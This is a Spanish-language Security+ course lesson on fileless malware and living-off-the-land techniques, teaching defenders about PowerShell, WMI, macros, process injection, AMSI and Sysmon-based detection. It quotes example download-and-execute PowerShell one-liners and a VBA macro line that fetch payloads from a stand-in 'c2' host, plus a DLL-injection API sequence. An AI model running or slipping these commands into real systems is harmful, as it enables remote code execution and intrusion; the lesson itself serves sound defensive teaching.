Malware sin archivos y ataques Living-off-the-Land
Aprenda cómo el malware sin archivos abusa de herramientas legítimas (PowerShell, WMI y macros) para evadir la detección tradicional basada en firmas.
Malware sin archivos y ataques Living-off-the-Land es una lección gratuita de Cloud & IT Cert Prep en CoddyKit. Esta es la lección 4 de 4. Puedes leer la lección completa abajo gratuitamente — luego la practicas en el navegador con un editor de código integrado y un tutor de IA 24/7. Forma parte de la ruta de aprendizaje de Cloud & IT Cert Prep, y tu progreso se sincroniza en la web y la app de CoddyKit. El curso de Cloud & IT Cert Prep incluye 4 lecciones en total.
Por qué los ataques sin archivos son tan eficaces
El malware tradicional escribe archivos ejecutables en el disco, lo que brinda al antivirus basado en firmas la oportunidad de analizarlos y detectarlos. El malware sin archivos opera completamente en la memoria o abusa de herramientas legítimas ya instaladas, sin dejar archivos de malware tradicionales que el antivirus pueda encontrar. Esto reduce drásticamente las tasas de detección de las herramientas basadas en firmas. Los proveedores de seguridad informan que los ataques de malware sin archivos tienen una probabilidad 10 veces mayor de éxito que los ataques basados en archivos. El atraco al Bangladesh Bank de 2016, las variantes de Petya/NotPetya de 2017 y numerosas intrusiones de Estados nación han utilizado técnicas sin archivos para mantener la persistencia y evadir la detección.
Técnicas de tipo Living-off-the-Land (LotL)
Los ataques de Living-off-the-land (LotL) utilizan herramientas y utilidades legítimas que ya están presentes en el sistema víctima para llevar a cabo acciones maliciosas. El sistema operativo y el software de seguridad confían en estas herramientas —PowerShell, WMI, certutil, mshta, regsvr32 y rundll32— porque tienen usos legítimos. Un atacante que utiliza exclusivamente herramientas integradas puede confundirse con la actividad administrativa normal. El desafío para los defensores consiste en distinguir el uso malicioso de estas herramientas del trabajo administrativo legítimo. Por eso, el análisis de comportamiento y el conocimiento del contexto son más eficaces que la detección basada en firmas para las técnicas LotL.
# Common LotL (LOLBins - Living Off the Land Binaries):
# certutil.exe - download files from internet
# mshta.exe - execute HTA (HTML Application) scripts
# regsvr32.exe - execute DLL or scriptlets remotely (Squiblydoo)
# rundll32.exe - execute DLL exports
# wmic.exe - WMI queries and lateral movement
# bitsadmin.exe - download/upload via BITS service
# powershell.exe - nearly unlimited capability
# cmstp.exe - bypass UAC, run scriptsPowerShell como herramienta de ataque
PowerShell es la herramienta LotL más utilizada de forma indebida porque proporciona acceso a todo el framework .NET, WMI y las API de Windows, dejando un rastro mínimo cuando se ejecuta en la memoria. Los atacantes descargan scripts de PowerShell directamente en la memoria sin escribirlos en el disco, codifican comandos en Base64 para ofuscarlos frente al registro y utilizan funciones como la reflexión para cargar ensamblados .NET en la memoria. Los frameworks Empire y Cobalt Strike dependen en gran medida de PowerShell durante la explotación posterior. Entre las defensas se incluyen PowerShell Constrained Language Mode, ScriptBlock Logging (registra el contenido decodificado de los scripts), Module Logging y la restricción de quién puede ejecutar PowerShell mediante la directiva de grupo.
# PowerShell attack example (educational):
# Download and execute payload entirely in memory:
# powershell.exe -NoP -NonI -Exec Bypass -W Hidden -Enc <base64>
# IEX (New-Object Net.WebClient).DownloadString('http://c2/payload.ps1')
# Defense: Enable PowerShell logging (Group Policy):
# Computer Config -> Admin Templates -> Windows Components
# -> Windows PowerShell
# Turn on PowerShell Script Block Logging: Enabled
# Turn on Module Logging: Enabled
# Turn on Transcription: EnabledWMI para la persistencia y el movimiento lateral
WMI (Windows Management Instrumentation) es una potente función de Windows para la administración de sistemas que los atacantes utilizan de forma indebida para la persistencia y el movimiento lateral. Una suscripción a eventos de WMI activa un comando cuando ocurre un evento especificado (por ejemplo, cada 5 minutos, al iniciar sesión o cuando se inicia un proceso específico). Estas suscripciones sobreviven a los reinicios, se almacenan en el repositorio de WMI y no aparecen como tareas programadas tradicionales ni como claves de ejecución del registro, por lo que evaden muchas herramientas de detección de persistencia. Los atacantes también pueden utilizar WMI para ejecutar procesos en sistemas remotos mediante DCOM (puerto 135), lo que permite el movimiento lateral sin recursos compartidos de red.
# WMI event subscription for persistence (educational):
# Filter: every 5 minutes
# Consumer: execute powershell command
# Binding: connect filter to consumer
#
# Detection:
# Monitor WMI subscriptions:
Get-WMIObject -Namespace root\subscription -Class __EventFilter
Get-WMIObject -Namespace root\subscription -Class CommandLineEventConsumer
Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding
# Sysmon Event ID 19/20/21: WMI events loggedTécnicas de inyección de procesos
La inyección de procesos permite que el malware ejecute código malicioso dentro del espacio de direcciones de un proceso legítimo y confiable (explorer.exe, svchost.exe, notepad.exe). El código malicioso hereda los privilegios y la identidad del proceso, lo que hace que las conexiones de red parezcan proceder de una aplicación confiable. Entre las técnicas de inyección habituales se incluyen la inyección de DLL (cargar una DLL maliciosa en otro proceso), el vaciado de procesos (crear un proceso suspendido, desasignar su código y reemplazarlo por código malicioso) y la inyección reflexiva de DLL (cargar una DLL directamente desde la memoria sin escribirla en el disco). Las herramientas de EDR detectan la inyección mediante la supervisión de secuencias de llamadas a API (OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread).
# DLL injection API sequence:
# 1. OpenProcess(PROCESS_ALL_ACCESS, target_pid)
# 2. VirtualAllocEx(target, NULL, dll_path_len, MEM_COMMIT, PAGE_READWRITE)
# 3. WriteProcessMemory(target, alloc_addr, dll_path, dll_path_len)
# 4. CreateRemoteThread(target, NULL, 0, LoadLibraryA, alloc_addr)
# Sysmon rules to detect injection:
# Event ID 8: CreateRemoteThread
# Event ID 10: ProcessAccess (targetted process opened)
# Event ID 25: ProcessTampering (image changed in memory)Documentos con macros como puntos de entrada
Muchas cadenas de ataque sin archivos comienzan con un documento malicioso de Office que contiene macros de VBA. Cuando el usuario abre el documento y habilita las macros (a menudo atraído por un mensaje como «Enable Content to view this document»), la macro ejecuta PowerShell para descargar y ejecutar una carga útil directamente en la memoria. La carga útil nunca toca el disco; únicamente lo hace el documento original de Office. Por eso el examen Security+ hace hincapié en deshabilitar las macros y desplegar reglas de ASR (Attack Surface Reduction). Los frameworks modernos de phishing de tipo atacante en el medio (como Evilginx2) también entregan documentos maliciosos después de capturar las credenciales para desplegar RAT.
# Malicious macro flow (educational):
# 1. User receives .docm via email
# 2. User opens, clicks 'Enable Content'
# 3. VBA macro runs:
# Shell 'powershell -ep bypass -nop -c "IEX(New-Object Net.WebClient).DownloadString(''http://c2/stage2.ps1'')"'
# 4. PowerShell downloads stage2 into memory
# 5. stage2 runs shellcode / loads Cobalt Strike Beacon in memory
# 6. No malware files on disk; only the .docm exists
# ASR rule to block:
# 'Block all Office applications from creating child processes'AMSI: Antimalware Scan Interface
AMSI (Antimalware Scan Interface) es una API de Windows que permite a las aplicaciones (PowerShell, VBScript, JScript y Office) enviar contenido al motor antivirus instalado para analizarlo durante la ejecución, incluso antes de que el contenido se escriba en el disco. AMSI permite a los proveedores de antivirus analizar el contenido de los scripts que, de otro modo, sería invisible para el análisis basado en archivos. Los atacantes intentan eludir AMSI modificando mediante parches amsi.dll en la memoria para que devuelva un resultado de «clean» para todos los envíos, o bien ofuscando el contenido de los scripts para evadir la coincidencia de firmas. Las herramientas de EDR supervisan los intentos de aplicar parches a AMSI como indicador de actividad de ataques sin archivos.
# How AMSI works:
# PowerShell/WScript calls AmsiScanBuffer() before execution
# Windows Defender (or other AV) scans the buffer
# If malicious: AMSI returns AMSI_RESULT_DETECTED -> execution blocked
# AMSI bypass attempts to detect (Sysmon/EDR):
# Memory write to amsi.dll: patch AmsiScanBuffer to always return 0
# Unloading amsi.dll from process memory
# PowerShell Constrained Language Mode + AMSI = stronger defenseDetección de ataques sin archivos
La detección del malware sin archivos requiere pasar de la detección basada en archivos a la supervisión del comportamiento. Entre las principales estrategias de detección se incluyen las siguientes: PowerShell ScriptBlock Logging captura el contenido decodificado de los scripts aunque estén codificados en la línea de comandos; Sysmon registra la creación de procesos con las líneas de comandos completas, las conexiones de red con la atribución al proceso y las modificaciones del registro; las reglas de comportamiento de EDR generan alertas sobre relaciones sospechosas entre procesos (Word inicia PowerShell, PowerShell inicia cmd, certutil descarga ejecutables); y Windows Event Forwarding envía estos registros a un SIEM centralizado para su correlación y conservación a largo plazo.
# Sysmon detection rules for LotL:
# Event ID 1: Process creation
# Alert if: Word.exe spawns cmd.exe or powershell.exe
# Alert if: certutil.exe with -urlcache -f parameters
# Alert if: mshta.exe with remote URL argument
# Event ID 3: Network connection
# Alert if: powershell.exe initiates outbound connection
# Alert if: mshta.exe connects to non-Microsoft IPs
# Event ID 7: Image loaded
# Alert if: known-bad DLL loaded into legitimate processRestricción del uso de herramientas LotL
Las organizaciones pueden reducir la superficie de ataque LotL restringiendo qué usuarios pueden ejecutar herramientas potentes. PowerShell Constrained Language Mode limita las llamadas a .NET, los objetos COM y la reflexión de los que dependen los atacantes. AppLocker y WDAC (Windows Defender Application Control) pueden impedir que usuarios que no sean administradores ejecuten binarios específicos. El proyecto LOLBAS cataloga binarios LotL conocidos junto con sus técnicas de ataque, lo que ayuda a los defensores a identificar qué binarios deben supervisar o restringir. No todos los binarios LotL pueden bloquearse (muchos son necesarios para el funcionamiento del sistema operativo), pero es posible supervisar su uso teniendo en cuenta el contexto.
# PowerShell Constrained Language Mode:
$ExecutionContext.SessionState.LanguageMode = 'ConstrainedLanguage'
# Or via WDAC policy; CLM automatically applied when WDAC is active
# AppLocker: block mshta.exe for standard users
# Computer Config -> Windows Settings -> Security Settings
# -> Application Control Policies -> AppLocker
# Executable Rules -> Add Rule -> Deny -> mshta.exe (path rule)
# WDAC (stronger than AppLocker):
# Cannot be bypassed by local admin unlike AppLocker
# Enforced at kernel levelCobertura de MITRE ATT&CK para las técnicas sin archivos
El framework MITRE ATT&CK documenta ampliamente las técnicas sin archivos y LotL. Entre las sub técnicas principales se incluyen: T1059.001 (PowerShell), T1047 (ejecución mediante WMI), T1055 (inyección de procesos), T1140 (desofuscar/decodificar archivos), T1003.001 (memoria de LSASS para la extracción de credenciales) y T1546.003 (suscripción a eventos de WMI para la persistencia). Mapear sus capacidades de detección con estas técnicas mediante ATT&CK Navigator permite revelar brechas de cobertura y orientar el desarrollo de reglas de SIEM. El framework también proporciona orientación sobre mitigación y detección para cada técnica.
Resumen de defensa contra el malware sin archivos
Una estrategia de defensa en capas contra el malware sin archivos incluye: habilitar el registro de PowerShell (ScriptBlock, Module y Transcription), desplegar Sysmon con una configuración completa, implementar AMSI con un motor antivirus actualizado, aplicar PowerShell Constrained Language Mode mediante WDAC, restringir la ejecución de macros en documentos de Office mediante la directiva de grupo, desplegar EDR con capacidades de detección de comportamiento y reenviar todos los registros a un SIEM con reglas de detección para cadenas de procesos maliciosas conocidas. La combinación de restringir la superficie de ataque y mejorar la visibilidad dificulta considerablemente la ejecución de ataques sin archivos sin ser detectados.
Comprobación rápida
Compruebe su comprensión de los conceptos de CompTIA Security+ (SY0-701) de esta lección.
Resumen de la lección
En esta lección ha aprendido que el malware sin archivos opera en la memoria y abusa de herramientas legítimas del sistema operativo, como PowerShell, WMI y certutil, para evadir la detección basada en firmas; que las técnicas de inyección de procesos ocultan código malicioso dentro de procesos confiables mediante la explotación de las API de administración de memoria de Windows; y que la detección de comportamiento mediante SIEM, Sysmon y EDR, combinada con el registro de PowerShell y AMSI, proporciona la defensa más sólida contra estas cadenas de ataque que evaden las firmas. A continuación exploraremos las diferencias entre el análisis de vulnerabilidades y las pruebas de penetración.
Preguntas frecuentes
¿La lección «Malware sin archivos y ataques Living-off-the-Land» es gratis?
Sí — el texto completo de «Malware sin archivos y ataques Living-off-the-Land» es gratis para leer aquí en la web. Para practicarla de forma interactiva (editor de código integrado y tutor de IA 24/7) y desbloquear el resto del curso de Cloud & IT Cert Prep, actualiza a CoddyKit PRO. El curso de Cloud & IT Cert Prep incluye 4 lecciones en total.
¿Qué aprenderé en «Malware sin archivos y ataques Living-off-the-Land»?
Aprenda cómo el malware sin archivos abusa de herramientas legítimas (PowerShell, WMI y macros) para evadir la detección tradicional basada en firmas. Practicas Cloud & IT Cert Prep con código real que ejecutas directamente en el navegador, y un tutor de IA 24/7 responde tus preguntas mientras trabajas en la lección.
¿Necesito experiencia previa para empezar Cloud & IT Cert Prep?
No se requiere experiencia previa. Cloud & IT Cert Prep en CoddyKit está estructurado para principiantes hasta estudiantes avanzados, así que puedes empezar aquí o desde el inicio y avanzar a tu ritmo. Esta es la lección 4 de 4.
¿Cuánto tiempo toma la lección «Malware sin archivos y ataques Living-off-the-Land»?
La mayoría de las lecciones de CoddyKit toman alrededor de 5–10 minutos. Cada una es compacta e interactiva, así que avanzas constantemente y retomas exactamente por donde dejaste en la web y la app.
¿Puedo escribir y ejecutar código en esta lección de Cloud & IT Cert Prep?
Sí. Cada lección de Cloud & IT Cert Prep incluye un editor de código integrado, así que escribes y ejecutas código real directamente en tu navegador y obtienes retroalimentación instantánea de IA — sin configuración local necesaria.
Todas las lecciones de este curso
- Virus, gusanos y troyanos
- Ransomware y cryptolockers
- Rootkits, spyware y keyloggers
- Malware sin archivos y ataques Living-off-the-Land